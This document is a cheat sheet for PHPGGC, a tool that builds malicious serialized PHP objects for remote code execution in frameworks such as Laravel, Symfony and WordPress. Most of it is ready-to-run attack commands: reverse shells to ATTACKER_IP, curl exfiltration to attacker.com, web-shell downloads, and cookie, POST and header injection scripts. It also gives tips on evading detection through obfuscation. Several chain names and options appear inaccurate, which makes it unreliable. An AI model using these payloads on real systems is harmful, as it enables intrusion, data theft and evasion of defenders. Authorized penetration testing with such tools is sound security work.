PHPGGC
Overview
Section titled “Overview”PHPGGC (PHP Generic Gadget Chains) is a tool for generating malicious serialized PHP objects that exploit insecure deserialization vulnerabilities. It leverages “gadget chains” from common PHP frameworks and libraries to achieve remote code execution (RCE) when vulnerable applications unserialize untrusted data.
Key Features:
- Pre-built gadget chains for popular PHP frameworks
- Automatic payload generation for common targets
- Support for multiple exploitation techniques
- Chain discovery and analysis
- Custom gadget chain creation
- Integration with exploitation frameworks
Installation
Section titled “Installation”From GitHub
Section titled “From GitHub”git clone https://github.com/ambionics/phpggc.git
cd phpggc
Verify Installation
Section titled “Verify Installation”./phpggc --version
./phpggc -l
Docker
Section titled “Docker”docker run -it --rm ambionics/phpggc
Requirements
Section titled “Requirements”- PHP 7.0+ or 8.0+
- Composer (optional, for dependency management)
Basic Usage
Section titled “Basic Usage”List Available Gadget Chains
Section titled “List Available Gadget Chains”./phpggc -l
./phpggc -l | grep "Laravel"
Generate Simple Payload
Section titled “Generate Simple Payload”./phpggc Laravel/RCE
Generate With Command
Section titled “Generate With Command”./phpggc Laravel/RCE system "whoami"
Specify Output Format
Section titled “Specify Output Format”./phpggc -f json Laravel/RCE system "whoami"
./phpggc -f phtml Laravel/RCE system "whoami"
Core Commands
Section titled “Core Commands”| Command | Description |
|---|---|
-l, --list | List all available gadget chains |
-i, --info | Show detailed chain information |
-c, --chains | Show chains for specific framework |
-f, --format | Output format (raw, base64, json, phtml, etc.) |
-s, --side-effect | Generate chain with side effects |
--template | Use custom template for payload |
--skip-vulnerabilities | Skip vulnerability checks |
--verbose | Verbose output |
Available Gadget Chains
Section titled “Available Gadget Chains”Laravel Chains
Section titled “Laravel Chains”# RCE via Laravel gadgets
./phpggc Laravel/RCE
# List all Laravel chains
./phpggc -l | grep -i laravel
Symfony Chains
Section titled “Symfony Chains”# RCE via Symfony
./phpggc Symfony/RCE
# EventDispatcher exploitation
./phpggc -i Symfony/EventDispatcher
WordPress Chains
Section titled “WordPress Chains”# WordPress plugin exploitation
./phpggc WordPress/RCE
./phpggc WordPress/Plugin
Zend Framework Chains
Section titled “Zend Framework Chains”# Zend/Laminas exploitation
./phpggc Zend/RCE
./phpggc Laminas/RCE
Other Popular Frameworks
Section titled “Other Popular Frameworks”./phpggc Yii/RCE
./phpggc CakePHP/RCE
./phpggc Doctrine/RCE
./phpggc Magento/RCE
Output Formats
Section titled “Output Formats”Raw Serialized Format
Section titled “Raw Serialized Format”./phpggc -f raw Laravel/RCE system "whoami"
Base64 Encoded
Section titled “Base64 Encoded”./phpggc -f base64 Laravel/RCE system "whoami"
URL Encoded
Section titled “URL Encoded”./phpggc -f url Laravel/RCE system "whoami"
JSON Format
Section titled “JSON Format”./phpggc -f json Laravel/RCE system "whoami"
PHTML (PHP file)
Section titled “PHTML (PHP file)”./phpggc -f phtml Laravel/RCE system "whoami" > payload.php
php payload.php
Exploitation Techniques
Section titled “Exploitation Techniques”Remote Command Execution
Section titled “Remote Command Execution”# Execute system commands
./phpggc Laravel/RCE system "id"
./phpggc Laravel/RCE system "cat /etc/passwd"
./phpggc Laravel/RCE system "curl http://attacker.com"
Reverse Shell
Section titled “Reverse Shell”# Generate reverse shell payload
./phpggc Laravel/RCE system "bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1"
# Or with nc
./phpggc Laravel/RCE system "nc -e /bin/bash ATTACKER_IP 4444"
File Writing
Section titled “File Writing”# Write files via payload
./phpggc Laravel/RCE system "echo 'shell code' > /tmp/shell.php"
# More complex file operations
./phpggc Laravel/RCE system "wget http://attacker.com/shell.php -O /var/www/shell.php"
Data Exfiltration
Section titled “Data Exfiltration”# Extract sensitive data
./phpggc Laravel/RCE system "cat /var/www/config.php | base64"
# Curl exfiltration
./phpggc Laravel/RCE system "curl http://attacker.com/log.php?data=$(whoami)"
Chain Information and Analysis
Section titled “Chain Information and Analysis”Detailed Chain Information
Section titled “Detailed Chain Information”# Get full details about a chain
./phpggc -i Laravel/RCE
# Show vulnerability details
./phpggc -i Symfony/RCE --verbose
List Chains by Framework
Section titled “List Chains by Framework”# All chains for a specific framework
./phpggc -l Laravel
./phpggc -l WordPress
./phpggc -l Symfony
Search for Specific Gadgets
Section titled “Search for Specific Gadgets”# Find chains containing specific keywords
./phpggc -l | grep -i "file"
./phpggc -l | grep -i "execute"
Advanced Usage
Section titled “Advanced Usage”Custom Templates
Section titled “Custom Templates”# Using custom template file
./phpggc -f raw --template custom.template Laravel/RCE system "whoami"
Side Effect Chains
Section titled “Side Effect Chains”# Chains with side effects (file write, etc.)
./phpggc -s Laravel/RCE system "whoami"
Chaining Multiple Commands
Section titled “Chaining Multiple Commands”# Execute multiple commands
./phpggc Laravel/RCE system "id; whoami; pwd"
# Or use command separator
./phpggc Laravel/RCE system "cmd1 && cmd2 && cmd3"
Bypassing Filters
Section titled “Bypassing Filters”# Using alternative command syntax
./phpggc Laravel/RCE system "sh -c 'command'"
# Hex encoding commands
./phpggc Laravel/RCE system "echo 'x' | xxd -r -p"
Integration with Exploitation Workflows
Section titled “Integration with Exploitation Workflows”Web Application Testing
Section titled “Web Application Testing”# Generate payload for cookie injection
PAYLOAD=$(./phpggc -f base64 Laravel/RCE system "whoami")
curl -b "session=$PAYLOAD" http://target.com
# For POST parameter
curl -X POST http://target.com -d "data=$(./phpggc -f url Laravel/RCE system 'id')"
Automated Exploitation
Section titled “Automated Exploitation”# Generate payload and store in variable
PAYLOAD=$(./phpggc -f raw Laravel/RCE system "bash -i >& /dev/tcp/10.10.10.10/4444 0>&1")
# Use in exploitation script
php -r "echo unserialize(base64_decode('$PAYLOAD'));"
Testing Multiple Frameworks
Section titled “Testing Multiple Frameworks”#!/bin/bash
# Test multiple framework vulnerabilities
COMMAND="id"
for framework in Laravel Symfony Yii WordPress; do
echo "Testing $framework..."
./phpggc -f raw "$framework/RCE" system "$COMMAND"
done
Serialization and Injection Points
Section titled “Serialization and Injection Points”URL Parameter Injection
Section titled “URL Parameter Injection”# Target URL with serialized parameter
curl "http://target.com/profile?data=$(./phpggc -f url Laravel/RCE system 'whoami')"
Cookie Injection
Section titled “Cookie Injection”# Inject serialized payload into cookie
curl -b "session=$(./phpggc -f base64 Laravel/RCE system 'id')" http://target.com
POST Body Injection
Section titled “POST Body Injection”# Inject into POST parameter
curl -X POST http://target.com \
-d "profile=$(./phpggc -f url Laravel/RCE system 'whoami')"
Header Injection
Section titled “Header Injection”# Inject into custom header
curl -H "X-Data: $(./phpggc -f base64 Laravel/RCE system 'id')" http://target.com
Real-World Exploitation Scenarios
Section titled “Real-World Exploitation Scenarios”Laravel Application RCE
Section titled “Laravel Application RCE”# Step 1: Identify Laravel application
# Step 2: Find unserialize() call (typically in session handling)
# Step 3: Generate payload
PAYLOAD=$(./phpggc -f base64 Laravel/RCE system "whoami")
# Step 4: Inject into vulnerable endpoint
curl -b "PHPSESSID=$PAYLOAD" http://target-laravel.com
WordPress Plugin Exploitation
Section titled “WordPress Plugin Exploitation”# Identify vulnerable WordPress plugin using gadget chains
./phpggc -i WordPress/RCE
# Generate exploitation payload
./phpggc -f raw WordPress/RCE system "wp_create_user attacker password123"
# Or modify WordPress files
./phpggc WordPress/RCE system "wget http://attacker.com/shell.php -O /var/www/wp-content/shell.php"
Symfony Application Attack
Section titled “Symfony Application Attack”# Identify Symfony version and components
# Generate appropriate Symfony chain
./phpggc -l | grep Symfony
./phpggc -i Symfony/EventDispatcher
# Create payload targeting EventDispatcher
PAYLOAD=$(./phpggc -f base64 Symfony/RCE system "id")
Payload Encoding and Obfuscation
Section titled “Payload Encoding and Obfuscation”Base64 Encoding
Section titled “Base64 Encoding”# Generate base64-encoded payload
./phpggc -f base64 Laravel/RCE system "whoami" > payload.b64
# Decode and execute
cat payload.b64 | base64 -d | php
URL Encoding
Section titled “URL Encoding”# Generate URL-safe payload
./phpggc -f url Laravel/RCE system "whoami"
# Use in URL parameter
echo "http://target.com?data=$(./phpggc -f url Laravel/RCE system 'id')"
Hexadecimal Encoding
Section titled “Hexadecimal Encoding”# Encode command to hex
echo -n "whoami" | xxd -p
# Use in payload
./phpggc Laravel/RCE system "echo '$(echo -n whoami | xxd -p)' | xxd -r -p"
Defensive Analysis
Section titled “Defensive Analysis”Identify Vulnerable Code Patterns
Section titled “Identify Vulnerable Code Patterns”# Look for unserialize() in source code
grep -r "unserialize" /path/to/php/app
# Check for user input passing to unserialize
grep -r "unserialize(\$_" /path/to/php/app
Testing for Gadget Chain Exploitation
Section titled “Testing for Gadget Chain Exploitation”# Run test payload through application
PAYLOAD=$(./phpggc Laravel/RCE system "touch /tmp/test")
# Monitor for execution
tail -f /var/log/apache2/access.log
Version Detection
Section titled “Version Detection”# Detect framework version for appropriate chains
curl -s http://target.com | grep -i "Laravel\|Symfony\|WordPress"
# Check composer.lock or package files
curl http://target.com/composer.lock 2>/dev/null | grep -i version
Practical Exploitation Workflow
Section titled “Practical Exploitation Workflow”Full Attack Chain
Section titled “Full Attack Chain”#!/bin/bash
TARGET="http://target.com"
FRAMEWORK="Laravel"
# Step 1: Identify vulnerability
echo "[+] Testing for deserialization vulnerabilities..."
# Step 2: Generate payload for RCE
COMMAND="bash -i >& /dev/tcp/10.10.10.10/4444 0>&1"
PAYLOAD=$(./phpggc -f base64 "$FRAMEWORK/RCE" system "$COMMAND")
# Step 3: Deliver payload
echo "[+] Injecting payload..."
curl -b "session=$PAYLOAD" "$TARGET/dashboard"
# Step 4: Listener
# nc -lvnp 4444
Testing Multiple Injection Points
Section titled “Testing Multiple Injection Points”#!/bin/bash
PAYLOAD=$(./phpggc -f base64 Laravel/RCE system "id")
# Test different injection points
echo "Testing Cookie..."
curl -b "data=$PAYLOAD" http://target.com
echo "Testing POST..."
curl -X POST -d "input=$PAYLOAD" http://target.com
echo "Testing Header..."
curl -H "X-Custom: $PAYLOAD" http://target.com
Troubleshooting
Section titled “Troubleshooting”Payload Not Executing
Section titled “Payload Not Executing”# Verify PHP version compatibility
php --version
# Test payload locally first
php -r "echo unserialize(base64_decode('PAYLOAD_HERE'));"
# Check target uses unserialize()
grep -r "unserialize" target_code/
Encoding Issues
Section titled “Encoding Issues”# Test different output formats
./phpggc -f raw Laravel/RCE system "whoami"
./phpggc -f base64 Laravel/RCE system "whoami"
./phpggc -f json Laravel/RCE system "whoami"
Chain Not Found
Section titled “Chain Not Found”# Update PHPGGC database
git pull
./phpggc -l --refresh
# Check if framework is supported
./phpggc -l | grep -i "framework_name"
Security Considerations
Section titled “Security Considerations”Safe Testing
Section titled “Safe Testing”- Only test on authorized systems
- Use isolated lab environments
- Document all testing activities
- Have rollback procedures ready
Payload Detection
Section titled “Payload Detection”- Avoid common payload patterns
- Use encoding/obfuscation
- Employ timing-based techniques
- Monitor system logs for detection
Version and Updates
Section titled “Version and Updates”# Check version
./phpggc --version
# Update gadget chains
cd phpggc && git pull origin master
Legal and Ethical Considerations
Section titled “Legal and Ethical Considerations”Critical: PHPGGC generates payloads for testing deserialization vulnerabilities only on systems where you have explicit authorization. Unauthorized exploitation is illegal. Always obtain written permission before conducting security assessments on any system.